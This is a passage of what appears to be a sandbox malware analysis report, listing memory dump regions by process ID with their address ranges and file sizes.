                • memory/396-83-0x00000000064C0000-0x00000000064C1000-memory.dmp
                  Filesize

                  4KB

                • memory/396-70-0x00000000063A0000-0x00000000063A1000-memory.dmp
                  Filesize

                  4KB

                • memory/396-69-0x00000000062A0000-0x00000000062A1000-memory.dmp
                  Filesize

                  4KB

                • memory/396-77-0x0000000006490000-0x0000000006491000-memory.dmp
                  Filesize

                  4KB

                • memory/396-208-0x0000000006750000-0x0000000006751000-memory.dmp
                  Filesize

                  4KB

                • memory/396-22-0x0000000000000000-mapping.dmp
                • memory/396-35-0x0000000070F30000-0x000000007161E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/396-210-0x0000000006760000-0x0000000006761000-memory.dmp
                  Filesize

                  4KB

                • memory/568-21-0x0000000000000000-mapping.dmp
                • memory/608-355-0x0000000000000000-mapping.dmp
                • memory/608-375-0x0000000004CB0000-0x0000000004CB2000-memory.dmp
                  Filesize

                  8KB

                • memory/608-376-0x0000000000670000-0x0000000000680000-memory.dmp
                  Filesize

                  64KB

                • memory/608-373-0x0000000000700000-0x0000000000705000-memory.dmp
                  Filesize

                  20KB

                • memory/608-381-0x0000000004CB0000-0x0000000004CB2000-memory.dmp
                  Filesize

                  8KB

                • memory/608-372-0x0000000000690000-0x00000000006A2000-memory.dmp
                  Filesize

                  72KB

                • memory/608-369-0x00000000003C0000-0x00000000003C1000-memory.dmp
                  Filesize

                  4KB

                • memory/608-365-0x0000000001230000-0x0000000001231000-memory.dmp
                  Filesize

                  4KB

                • memory/608-358-0x0000000072C90000-0x000000007337E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/616-317-0x00000000009D0000-0x00000000009D1000-memory.dmp
                  Filesize

                  4KB

                • memory/616-314-0x0000000000CF0000-0x0000000000CF1000-memory.dmp
                  Filesize

                  4KB

                • memory/616-310-0x0000000000000000-mapping.dmp
                • memory/616-312-0x00000000703D0000-0x0000000070ABE000-memory.dmp
                  Filesize

                  6.9MB

                • memory/616-319-0x00000000009E0000-0x0000000000A04000-memory.dmp
                  Filesize

                  144KB

                • memory/760-361-0x0000000000000000-mapping.dmp
                • memory/776-286-0x0000000000417A8B-mapping.dmp
                • memory/776-296-0x0000000000417A8B-mapping.dmp
                • memory/776-287-0x0000000000417A8B-mapping.dmp
                • memory/776-288-0x0000000000417A8B-mapping.dmp
                • memory/776-289-0x0000000000417A8B-mapping.dmp
                • memory/776-290-0x0000000000417A8B-mapping.dmp
                • memory/776-291-0x0000000000417A8B-mapping.dmp
                • memory/776-292-0x0000000000417A8B-mapping.dmp
                • memory/776-298-0x0000000000417A8B-mapping.dmp
                • memory/776-294-0x0000000000417A8B-mapping.dmp
                • memory/776-295-0x0000000000417A8B-mapping.dmp
                • memory/776-233-0x0000000000417A8B-mapping.dmp
                • memory/776-297-0x0000000000417A8B-mapping.dmp
                • memory/776-285-0x0000000000417A8B-mapping.dmp
                • memory/992-36-0x0000000001140000-0x0000000001141000-memory.dmp
                  Filesize

                  4KB

                • memory/992-23-0x0000000000000000-mapping.dmp
                • memory/992-34-0x0000000070F30000-0x000000007161E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/992-50-0x0000000005300000-0x0000000005301000-memory.dmp
                  Filesize

                  4KB

                • memory/1032-302-0x0000000000400000-0x0000000000434000-memory.dmp
                  Filesize

                  208KB

                • memory/1032-303-0x0000000000417A8B-mapping.dmp
                • memory/1032-305-0x0000000000400000-0x0000000000434000-memory.dmp
                  Filesize

                  208KB

                • memory/1084-20-0x0000000000000000-mapping.dmp
                • memory/1180-18-0x0000000000000000-mapping.dmp
                • memory/1372-656-0x0000000000000000-mapping.dmp
                • memory/1380-402-0x0000000072C90000-0x000000007337E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/1380-406-0x0000000005400000-0x0000000005401000-memory.dmp
                  Filesize

                  4KB

                • memory/1380-405-0x0000000002740000-0x0000000002741000-memory.dmp
                  Filesize

                  4KB

                • memory/1380-404-0x00000000049A0000-0x00000000049A1000-memory.dmp
                  Filesize

                  4KB

                • memory/1380-403-0x0000000000C20000-0x0000000000C21000-memory.dmp
                  Filesize

                  4KB

                • memory/1380-399-0x0000000000000000-mapping.dmp
                • memory/1484-382-0x0000000000840000-0x0000000000843000-memory.dmp
                  Filesize

                  12KB

                • memory/1484-385-0x0000000001E70000-0x0000000001E81000-memory.dmp
                  Filesize

                  68KB

                • memory/1484-374-0x00000000004E0000-0x00000000004F1000-memory.dmp
                  Filesize

                  68KB

                • memory/1484-360-0x0000000000000000-mapping.dmp
                • memory/1484-366-0x00000000000D0000-0x00000000000D1000-memory.dmp
                  Filesize

                  4KB

                • memory/1484-364-0x0000000072C90000-0x000000007337E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/1484-370-0x0000000000410000-0x0000000000411000-memory.dmp
                  Filesize

                  4KB

                • memory/1488-42-0x0000000070F30000-0x000000007161E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/1488-30-0x0000000000000000-mapping.dmp
                • memory/1508-335-0x0000000000000000-mapping.dmp
                • memory/1568-38-0x0000000070F30000-0x000000007161E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/1568-32-0x0000000000000000-mapping.dmp
                • memory/1572-29-0x0000000000000000-mapping.dmp
                • memory/1828-334-0x0000000000000000-mapping.dmp
                • memory/1832-10-0x0000000000000000-mapping.dmp
                • memory/1840-252-0x0000000070F30000-0x000000007161E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/1840-256-0x0000000000430000-0x0000000000431000-memory.dmp
                  Filesize

                  4KB

                • memory/1840-293-0x0000000002080000-0x00000000020D1000-memory.dmp
                  Filesize

                  324KB

                • memory/1840-254-0x0000000000820000-0x0000000000821000-memory.dmp
                  Filesize

                  4KB

                • memory/1840-250-0x0000000000000000-mapping.dmp
                • memory/1852-0-0x0000000000000000-mapping.dmp
                • memory/1856-11-0x0000000000000000-mapping.dmp
                • memory/1872-352-0x0000000000000000-mapping.dmp
                • memory/1872-650-0x0000000050480000-0x000000005049A000-memory.dmp
                  Filesize

                  104KB

                • memory/1872-409-0x0000000002D90000-0x0000000002DDC000-memory.dmp
                  Filesize

                  304KB

                • memory/1880-5-0x0000000000000000-mapping.dmp
                • memory/1880-4-0x0000000000000000-mapping.dmp
                • memory/1924-8-0x0000000000000000-mapping.dmp
                • memory/1960-331-0x0000000000400000-0x0000000000420000-memory.dmp
                  Filesize

                  128KB

                • memory/1960-329-0x000000000041A684-mapping.dmp
                • memory/1960-328-0x0000000000400000-0x0000000000420000-memory.dmp
                  Filesize

                  128KB

                • memory/1972-12-0x0000000000000000-mapping.dmp
                • memory/1972-15-0x0000000070F30000-0x000000007161E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/1972-56-0x00000000053C0000-0x00000000053C1000-memory.dmp
                  Filesize

                  4KB

                • memory/2000-41-0x0000000004B60000-0x0000000004B61000-memory.dmp
                  Filesize

                  4KB

                • memory/2000-16-0x0000000070F30000-0x000000007161E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/2000-229-0x0000000006430000-0x0000000006431000-memory.dmp
                  Filesize

                  4KB

                • memory/2000-231-0x0000000006480000-0x0000000006481000-memory.dmp
                  Filesize

                  4KB

                • memory/2000-13-0x0000000000000000-mapping.dmp
                • memory/2000-222-0x0000000006340000-0x0000000006341000-memory.dmp
                  Filesize

                  4KB

                • memory/2100-654-0x0000000000000000-mapping.dmp
                • memory/2184-221-0x000000000043FCC3-mapping.dmp
                • memory/2184-224-0x0000000000400000-0x0000000000493000-memory.dmp
                  Filesize

                  588KB

                • memory/2184-218-0x0000000000400000-0x0000000000493000-memory.dmp
                  Filesize

                  588KB

                • memory/2244-658-0x0000000000000000-mapping.dmp
                • memory/2328-108-0x00000000001A0000-0x00000000001A1000-memory.dmp
                  Filesize

                  4KB

                • memory/2328-104-0x0000000000000000-mapping.dmp
                • memory/2328-209-0x0000000000AA0000-0x0000000000AAD000-memory.dmp
                  Filesize

                  52KB

                • memory/2328-107-0x0000000070F30000-0x000000007161E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/2328-197-0x0000000002090000-0x0000000002140000-memory.dmp
                  Filesize

                  704KB

                • memory/2364-659-0x0000000000000000-mapping.dmp
                • memory/2364-657-0x0000000000090000-0x0000000000091000-memory.dmp
                  Filesize

                  4KB

                • memory/2388-114-0x0000000000000000-mapping.dmp
                • memory/2408-122-0x000007FEF7AF0000-0x000007FEF7D6A000-memory.dmp
                  Filesize

                  2.5MB

                • memory/2416-118-0x0000000000000000-mapping.dmp
                • memory/2520-400-0x0000000001E40000-0x0000000001E64000-memory.dmp
                  Filesize

                  144KB

                • memory/2520-349-0x0000000000840000-0x0000000000841000-memory.dmp
                  Filesize

                  4KB

                • memory/2520-348-0x0000000072C90000-0x000000007337E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/2520-345-0x0000000000000000-mapping.dmp
                • memory/2520-398-0x00000000007C0000-0x00000000007E3000-memory.dmp
                  Filesize

                  140KB

                • memory/2540-133-0x0000000000000000-mapping.dmp
                • memory/2560-136-0x0000000000000000-mapping.dmp
                • memory/2632-149-0x0000000000000000-mapping.dmp
                • memory/2644-152-0x0000000000000000-mapping.dmp
                • memory/2696-160-0x000000000043FCC3-mapping.dmp
                • memory/2696-164-0x0000000000400000-0x0000000000498000-memory.dmp
                  Filesize

                  608KB

                • memory/2696-159-0x0000000000400000-0x0000000000498000-memory.dmp
                  Filesize

                  608KB

                • memory/2704-165-0x000000000043FCC3-mapping.dmp
                • memory/2716-417-0x0000000000000000-mapping.dmp
                • memory/2716-521-0x0000000000000000-mapping.dmp
                • memory/2716-278-0x0000000000000000-mapping.dmp
                • memory/2716-652-0x0000000000000000-mapping.dmp
                • memory/2716-651-0x0000000003C80000-0x0000000003C81000-memory.dmp
                  Filesize

                  4KB

                • memory/2716-649-0x0000000000000000-mapping.dmp
                • memory/2716-647-0x0000000000000000-mapping.dmp
                • memory/2716-645-0x0000000000000000-mapping.dmp
                • memory/2716-643-0x0000000000000000-mapping.dmp
                • memory/2716-641-0x0000000000000000-mapping.dmp
                • memory/2716-639-0x0000000000000000-mapping.dmp
                • memory/2716-637-0x0000000000000000-mapping.dmp
                • memory/2716-635-0x0000000000000000-mapping.dmp
                • memory/2716-633-0x0000000000000000-mapping.dmp
                • memory/2716-631-0x0000000000000000-mapping.dmp
                • memory/2716-629-0x0000000000000000-mapping.dmp
                • memory/2716-410-0x00000000000D0000-0x00000000000D1000-memory.dmp
                  Filesize

                  4KB

                • memory/2716-411-0x0000000000000000-mapping.dmp
                • memory/2716-412-0x0000000000150000-0x0000000000151000-memory.dmp
                  Filesize

                  4KB

                • memory/2716-413-0x0000000000000000-mapping.dmp
                • memory/2716-415-0x0000000000000000-mapping.dmp
                • memory/2716-627-0x0000000000000000-mapping.dmp
                • memory/2716-419-0x0000000000000000-mapping.dmp
                • memory/2716-423-0x0000000000000000-mapping.dmp
                • memory/2716-421-0x0000000000000000-mapping.dmp
                • memory/2716-425-0x0000000000000000-mapping.dmp
                • memory/2716-427-0x0000000000000000-mapping.dmp
                • memory/2716-429-0x0000000000000000-mapping.dmp
                • memory/2716-431-0x0000000000000000-mapping.dmp
                • memory/2716-433-0x0000000000000000-mapping.dmp
                • memory/2716-435-0x0000000000000000-mapping.dmp
                • memory/2716-437-0x0000000000000000-mapping.dmp
                • memory/2716-439-0x0000000000000000-mapping.dmp
                • memory/2716-441-0x0000000000000000-mapping.dmp
                • memory/2716-443-0x0000000000000000-mapping.dmp
                • memory/2716-445-0x0000000000000000-mapping.dmp
                • memory/2716-447-0x0000000000000000-mapping.dmp
                • memory/2716-449-0x0000000000000000-mapping.dmp
                • memory/2716-451-0x0000000000000000-mapping.dmp
                • memory/2716-453-0x0000000000000000-mapping.dmp
                • memory/2716-455-0x0000000000000000-mapping.dmp
                • memory/2716-457-0x0000000000000000-mapping.dmp
                • memory/2716-459-0x0000000000000000-mapping.dmp
                • memory/2716-461-0x0000000000000000-mapping.dmp
                • memory/2716-463-0x0000000000000000-mapping.dmp
                • memory/2716-465-0x0000000000000000-mapping.dmp
                • memory/2716-467-0x0000000000000000-mapping.dmp
                • memory/2716-469-0x0000000000000000-mapping.dmp
                • memory/2716-471-0x0000000000000000-mapping.dmp
                • memory/2716-473-0x0000000000000000-mapping.dmp
                • memory/2716-475-0x0000000000000000-mapping.dmp
                • memory/2716-477-0x0000000000000000-mapping.dmp
                • memory/2716-479-0x0000000000000000-mapping.dmp
                • memory/2716-481-0x0000000000000000-mapping.dmp
                • memory/2716-483-0x0000000000000000-mapping.dmp
                • memory/2716-485-0x0000000000000000-mapping.dmp
                • memory/2716-487-0x0000000000000000-mapping.dmp
                • memory/2716-489-0x0000000000000000-mapping.dmp
                • memory/2716-491-0x0000000000000000-mapping.dmp
                • memory/2716-493-0x0000000000000000-mapping.dmp
                • memory/2716-495-0x0000000000000000-mapping.dmp
                • memory/2716-497-0x0000000000000000-mapping.dmp
                • memory/2716-499-0x0000000000000000-mapping.dmp
                • memory/2716-501-0x0000000000000000-mapping.dmp
                • memory/2716-503-0x0000000000000000-mapping.dmp
                • memory/2716-505-0x0000000000000000-mapping.dmp
                • memory/2716-507-0x0000000000000000-mapping.dmp
                • memory/2716-509-0x0000000000000000-mapping.dmp
                • memory/2716-511-0x0000000000000000-mapping.dmp
                • memory/2716-513-0x0000000000000000-mapping.dmp
                • memory/2716-515-0x0000000000000000-mapping.dmp
                • memory/2716-517-0x0000000000000000-mapping.dmp
                • memory/2716-519-0x0000000000000000-mapping.dmp
                • memory/2716-625-0x0000000000000000-mapping.dmp
                • memory/2716-523-0x0000000000000000-mapping.dmp
                • memory/2716-525-0x0000000000000000-mapping.dmp
                • memory/2716-527-0x0000000000000000-mapping.dmp
                • memory/2716-529-0x0000000000000000-mapping.dmp
                • memory/2716-531-0x0000000000000000-mapping.dmp
                • memory/2716-533-0x0000000000000000-mapping.dmp
                • memory/2716-535-0x0000000000000000-mapping.dmp
                • memory/2716-537-0x0000000000000000-mapping.dmp
                • memory/2716-539-0x0000000000000000-mapping.dmp
                • memory/2716-541-0x0000000000000000-mapping.dmp
                • memory/2716-543-0x0000000000000000-mapping.dmp
                • memory/2716-545-0x0000000000000000-mapping.dmp
                • memory/2716-547-0x0000000000000000-mapping.dmp
                • memory/2716-549-0x0000000000000000-mapping.dmp
                • memory/2716-551-0x0000000000000000-mapping.dmp
                • memory/2716-553-0x0000000000000000-mapping.dmp
                • memory/2716-555-0x0000000000000000-mapping.dmp
                • memory/2716-557-0x0000000000000000-mapping.dmp
                • memory/2716-559-0x0000000000000000-mapping.dmp
                • memory/2716-561-0x0000000000000000-mapping.dmp
                • memory/2716-563-0x0000000000000000-mapping.dmp
                • memory/2716-565-0x0000000000000000-mapping.dmp
                • memory/2716-567-0x0000000000000000-mapping.dmp
                • memory/2716-569-0x0000000000000000-mapping.dmp
                • memory/2716-571-0x0000000000000000-mapping.dmp
                • memory/2716-573-0x0000000000000000-mapping.dmp
                • memory/2716-575-0x0000000000000000-mapping.dmp
                • memory/2716-577-0x0000000000000000-mapping.dmp
                • memory/2716-579-0x0000000000000000-mapping.dmp
                • memory/2716-581-0x0000000000000000-mapping.dmp
                • memory/2716-583-0x0000000000000000-mapping.dmp
                • memory/2716-585-0x0000000000000000-mapping.dmp
                • memory/2716-587-0x0000000000000000-mapping.dmp
                • memory/2716-589-0x0000000000000000-mapping.dmp
                • memory/2716-591-0x0000000000000000-mapping.dmp
                • memory/2716-593-0x0000000000000000-mapping.dmp
                • memory/2716-595-0x0000000000000000-mapping.dmp
                • memory/2716-597-0x0000000000000000-mapping.dmp
                • memory/2716-599-0x0000000000000000-mapping.dmp
                • memory/2716-601-0x0000000000000000-mapping.dmp
                • memory/2716-603-0x0000000000000000-mapping.dmp
                • memory/2716-605-0x0000000000000000-mapping.dmp
                • memory/2716-607-0x0000000000000000-mapping.dmp
                • memory/2716-609-0x0000000000000000-mapping.dmp
                • memory/2716-611-0x0000000000000000-mapping.dmp
                • memory/2716-613-0x0000000000000000-mapping.dmp
                • memory/2716-615-0x0000000000000000-mapping.dmp
                • memory/2716-617-0x0000000000000000-mapping.dmp
                • memory/2716-619-0x0000000000000000-mapping.dmp
                • memory/2716-621-0x0000000000000000-mapping.dmp
                • memory/2716-623-0x0000000000000000-mapping.dmp
                • memory/2776-178-0x0000000000400000-0x0000000000439000-memory.dmp
                  Filesize

                  228KB

                • memory/2776-172-0x0000000000417A8B-mapping.dmp
                • memory/2776-171-0x0000000000400000-0x0000000000439000-memory.dmp
                  Filesize

                  228KB

                • memory/2804-371-0x0000000000000000-mapping.dmp
                • memory/2840-379-0x0000000000000000-mapping.dmp
                • memory/2856-277-0x0000000000000000-mapping.dmp
                • memory/2920-280-0x0000000001F80000-0x0000000001F91000-memory.dmp
                  Filesize

                  68KB

                • memory/2920-279-0x0000000000000000-mapping.dmp
                • memory/2920-307-0x00000000026A0000-0x00000000026B1000-memory.dmp
                  Filesize

                  68KB

                • memory/2932-391-0x0000000004C10000-0x0000000004C11000-memory.dmp
                  Filesize

                  4KB

                • memory/2932-386-0x0000000000000000-mapping.dmp
                • memory/2932-389-0x0000000072C90000-0x000000007337E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/2932-392-0x0000000002740000-0x0000000002741000-memory.dmp
                  Filesize

                  4KB

                • memory/2932-390-0x0000000002420000-0x0000000002421000-memory.dmp
                  Filesize

                  4KB

                • memory/2932-393-0x0000000004B30000-0x0000000004B31000-memory.dmp
                  Filesize

                  4KB

                • memory/2936-198-0x0000000000400000-0x0000000000425000-memory.dmp
                  Filesize

                  148KB

                • memory/2936-199-0x000000000041A684-mapping.dmp
                • memory/2936-201-0x0000000000400000-0x0000000000425000-memory.dmp
                  Filesize

                  148KB

                • memory/3008-204-0x000000000041A684-mapping.dmp
                • memory/3048-299-0x0000000000000000-mapping.dmp
                • memory/3048-313-0x0000000002650000-0x0000000002654000-memory.dmp
                  Filesize

                  16KB

                • memory/3060-253-0x00000000025B0000-0x00000000025B4000-memory.dmp
                  Filesize

                  16KB

                • memory/3060-207-0x0000000000000000-mapping.dmp